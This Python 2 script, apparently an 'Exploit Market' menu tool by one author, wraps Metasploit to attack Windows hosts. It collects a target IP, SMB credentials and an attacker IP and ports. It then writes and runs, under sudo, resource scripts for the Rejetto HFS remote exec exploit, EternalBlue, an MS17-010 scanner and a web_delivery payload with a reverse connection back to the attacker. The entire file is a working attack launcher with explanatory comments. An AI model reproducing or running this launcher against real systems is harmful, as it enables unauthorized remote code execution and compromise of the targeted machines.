# bin/python27
# Author: Abdul Aziz
"""Requirement: Must have Metasploit Framework Version: 4.14.28-dev or above installed."""
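def rhostInfo():
    """Prompt for the target account's username, password and domain.

    The three answers are stored in the module globals ``targetPCusername``,
    ``targetPCpassword`` and ``targetPCdomain``.

    Returns:
        A ``(username, password, domain)`` tuple, or ``None`` when any of the
        three answers was left empty.
    """
    # Function-scope import: the file has no top-level import block.
    import getpass

    global targetPCusername
    global targetPCpassword
    global targetPCdomain

    targetPCusername = raw_input("Please Enter Your Target PC's Username: ")
    # getpass keeps the password out of the terminal echo and scrollback.
    targetPCpassword = getpass.getpass("Please Enter Your Target PC's Password: ")
    targetPCdomain = raw_input("Please Enter The Target PC's Domain Name: ")

    # Only the values collected here are checked. custom_process_name is set
    # by processName() and may not exist yet when this function runs.
    answers = (targetPCusername, targetPCpassword, targetPCdomain)
    if not all(answers):
        print("It Seems That You Do not have sufficient Information to Run This Exploit.\n Please")
        return None
    return answers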
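def processName():
    """Prompt for the process name used for the ``ProcessName`` option.

    An empty answer selects the default ``spoolsv.exe``. Any other answer must
    be a single token that ends in ``.exe`` and is longer than the bare
    extension; the prompt repeats until one is given.

    Returns:
        The accepted name, which is also stored in the module global
        ``custom_process_name``.
    """
    global custom_process_name
    while True:
        print("Please Note: Press Enter to Skip and Default 'spoolsv.exe' will be used! ")
        answer = raw_input("Please Enter A Custom Process Name: ")
        if not answer:
            answer = "spoolsv.exe"
        # The value is written verbatim into a one-line "set ProcessName ..."
        # entry, so embedded whitespace is rejected along with names that do
        # not end in ".exe".
        has_space = any(ch.isspace() for ch in answer)
        if len(answer) <= 4 or not answer.endswith(".exe") or has_space:
            print("Invalid Service Name or File Extension: '.exe'")
            continue
        custom_process_name = answer
        return custom_process_name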
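def target_ip():
    """Prompt until a dotted-quad IPv4 address is entered, then return it.

    The accepted address is also stored in the module global
    ``target_ip_address``, which the script-writing functions read.

    Returns:
        The validated address as a string.
    """
    global target_ip_address

    def _is_dotted_quad(text):
        """Return True when *text* is four decimal octets, each 0-255."""
        octets = text.split(".")
        return len(octets) == 4 and all(
            part.isdigit() and len(part) <= 3 and int(part) <= 255
            for part in octets
        )

    while True:
        candidate = raw_input(' Please Enter the Target Ip Address: ').strip()
        # A length/dot-count heuristic rejects short valid addresses such as
        # "10.0.0.5" and accepts arbitrary text containing two dots; the value
        # ends up in a resource script, so it is parsed strictly instead.
        if _is_dotted_quad(candidate):
            target_ip_address = candidate
            return target_ip_address
        print("Alert: %s is not a valid ip address. Let's Try Again!" % (candidate))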
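def web_deliveryPreRequesties():
    """Collect the address and port settings for the web_delivery script.

    Sets the module globals ``localIPaddr``, ``localPort``, ``srvhost`` and
    ``srvport``. An empty port answer selects the advertised default
    (LPORT 4444, SRVPORT 80). No separate server address is prompted for, so
    ``srvhost`` is set to the same address as ``localIPaddr``.

    Returns:
        ``(localIPaddr, localPort, srvhost, srvport)``, or ``None`` when the
        address or either port is invalid (the globals are left untouched).
    """
    global localIPaddr
    global localPort
    global srvhost
    global srvport

    def _is_dotted_quad(text):
        """Return True when *text* is four decimal octets, each 0-255."""
        octets = text.split(".")
        return len(octets) == 4 and all(
            part.isdigit() and len(part) <= 3 and int(part) <= 255
            for part in octets
        )

    def _port_or_default(text, default):
        """Return *text* as a port, *default* when empty, None when invalid."""
        text = text.strip()
        if not text:
            return default
        if not text.isdigit():
            return None
        port = int(text)
        return port if 1 <= port <= 65535 else None

    address = raw_input('Please Enter the Your Ip Address: ').strip()
    print("Press Enter to Set (SRVPort: 80 & LPORT 4444) as Default.")
    # raw_input, not input(): on Python 2, input() evaluates the typed text
    # as a Python expression.
    connect_back = _port_or_default(raw_input("Enter Your Connect Back Port: "), 4444)
    server_port = _port_or_default(raw_input("Please Enter Server Port: "), 80)

    if not _is_dotted_quad(address):
        print("Please Enter Correct IP Address!")
        return None
    if connect_back is None or server_port is None:
        print("Port Number is Invalid!")
        return None

    localIPaddr = address
    srvhost = address
    localPort = connect_back
    srvport = server_port
    return localIPaddr, localPort, srvhost, srvport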
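def rejetto():
    """Write the resource script ``tmp/rejetto.exploit``.

    The target address is read from the module global ``target_ip_address``,
    which must be set before this is called. ``tmp/`` is relative to the
    current working directory and is not created here.
    """
    script = """\
use exploit/windows/http/rejetto_hfs_exec
set RHOST %s
exploit
""" % (target_ip_address)
    # The context manager closes (and flushes) the file before any caller
    # hands the path to another process.
    with open("tmp/rejetto.exploit", "w") as handle:
        handle.write(script)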
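def eternalBlue():
    """Write the resource script ``tmp/eternalBlue.exploit``.

    Reads the module globals ``target_ip_address`` and
    ``custom_process_name``; both must be set before this is called.
    ``tmp/`` is relative to the current working directory and is not created
    here.
    """
    script = """\
use exploit/windows/smb/ms17_010_eternalblue
set RHOST %s
set ProcessName %s
exploit
""" % (target_ip_address, custom_process_name)
    # The context manager closes (and flushes) the file before any caller
    # hands the path to another process.
    with open("tmp/eternalBlue.exploit", "w") as handle:
        handle.write(script)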
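def smb_scan():
    """Write the resource script ``tmp/smb_scan.exploit``.

    Reads the module globals ``target_ip_address``, ``targetPCusername`` and
    ``targetPCpassword``; all three must be set before this is called.

    The script contains the SMB password in clear text, so the file is
    created readable and writable by its owner only. It should be deleted
    once the scan has run.
    """
    # Function-scope import: the file has no top-level import block.
    import os

    # One argument per placeholder, in placeholder order. Supplying only the
    # address raises TypeError ("not enough arguments for format string").
    script = """\
use auxiliary/scanner/smb/smb_ms17_010
set RHOST %s
set SMBUser %s
set SMBPass %s
exploit
""" % (target_ip_address, targetPCusername, targetPCpassword)

    fd = os.open("tmp/smb_scan.exploit",
                 os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as handle:
        # The mode passed to os.open() only applies when the file is created;
        # tighten a file left over from an earlier run as well.
        os.fchmod(fd, 0o600)
        handle.write(script)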
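def web_delivery():
    """Write the resource script ``tmp/web_delivery.exploit``.

    Reads the module globals ``srvhost``, ``srvport``, ``localIPaddr`` and
    ``localPort``; all four must be set before this is called. ``tmp/`` is
    relative to the current working directory and is not created here.
    """
    # Arguments follow the placeholder order SRVHOST, SRVPORT, LHOST, LPORT.
    # Passing them as (localIPaddr, localPort, srvhost, srvport) puts the
    # connect-back port into SRVPORT and the server port into LPORT.
    script = """\
use exploit/multi/script/web_delivery
set SRVHOST %s
set SRVPORT %s
set LHOST %s
set LPORT %s
set target 2
exploit
""" % (srvhost, srvport, localIPaddr, localPort)
    with open("tmp/web_delivery.exploit", "w") as handle:
        handle.write(script)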
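def clearScreen():
    """Clear the terminal by running the ``clear`` command."""
    # Function-scope import: the file never imports os at module level, so
    # a bare os.system() call here raises NameError.
    import os

    os.system('clear')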
def welcomeBanner():
    """Clear the terminal and print the start-up banner."""
    banner = """
#-----------------------------------#
WELCOME TO EXPLOIT MARKET!
By: Abdul Aziz
#-----------------------------------#
PRESS ENTER TO START
"""
    clearScreen()
    # A single parenthesised argument prints the same text as the Python 2
    # print statement.
    print(banner)
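def exploitDescription():
    """Show the menu and handle selections until the process is interrupted.

    A selection may be given by number or by name (case-insensitive). For
    entries 1-3 the required inputs are collected, the matching resource
    script is written under ``tmp/`` and the user is asked whether to run it.
    Entry 4 is listed but not wired up.
    """
    clearScreen()
    print("""
#---------------------------#
# ABDUL's FAV EXPLOITS LIST #
####---------------------------####
# Github: abdu1aziz -- Abdul Aziz #
-----------------------------------------------------------------------------------------------
1. Type 'rejetto': hfs file server attack (2.3b and below are vulnrable).
-----------------------------------------------------------------------------------------------
2. Type 'eternalBlue': dll injection attack over smb server.
-----------------------------------------------------------------------------------------------
3. Type 'smb_scan': Scans target to view if vulnrable to Remote code Execution.
-----------------------------------------------------------------------------------------------
4. Type 'web_delivery': to generate a link to deliever payload wirelessly.(Memory Injection).
-----------------------------------------------------------------------------------------------
""")
    while True:
        # raw_input() returns text, so numbers are matched as strings and
        # names are matched after lower-casing both sides.
        choice = raw_input("Please Choose an Exploit By Name or Number: ").strip().lower()
        if choice in ('1', 'rejetto'):
            target_ip()
            rejetto()
            _run_or_report("rejetto.exploit")
        elif choice in ('2', 'eternalblue'):
            target_ip()
            # eternalBlue() reads custom_process_name, which only
            # processName() sets.
            processName()
            eternalBlue()
            _run_or_report("eternalBlue.exploit")
        elif choice in ('3', 'smb_scan'):
            target_ip()
            rhostInfo()
            smb_scan()
            _run_or_report("smb_scan.exploit")
        elif choice in ('4', 'web_delivery'):
            # No script is written for this entry, so nothing is offered to
            # run and no "created" message is printed.
            print("'web_delivery' is not available from this menu yet.")


def _run_or_report(script_name):
    """Offer to run ``tmp/<script_name>``; otherwise report where it is."""
    # Function-scope import: the file has no top-level import block.
    import subprocess

    script_path = "tmp/" + script_name
    answer = raw_input("Would You like to run the Handler? Y/N").lower()
    if answer == 'y':
        clearScreen()
        print("Please Wait While We Get Things Up and Running!")
        # Argument list, no shell. The script is executed with sudo, so tmp/
        # should not be writable by other users.
        subprocess.call(["sudo", "msfconsole", "-q", "-r", script_path])
    else:
        print("Your Handler '%s' has been successfully created at: '%s'"
              % (script_name, script_path))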
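def main():
    """Wait for Enter, initialise the Metasploit database and open the menu.

    Typing anything other than a bare Enter ends the function without
    starting anything.
    """
    # Function-scope import: the file never imports os at module level, so
    # a bare os.system() call here raises NameError.
    import os

    # NOTE(review): welcomeBanner() prints "PRESS ENTER TO START" but is never
    # called; presumably it was meant to run before this prompt -- confirm.
    enterToStart = raw_input("")
    if not enterToStart:
        # msfdb init runs under sudo, so a password prompt may appear here.
        os.system('clear && sudo msfdb init && clear')
        exploitDescription()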
# Start the interactive menu only when the file is executed as a script,
# not when it is imported.
if "__main__" == __name__:
    main()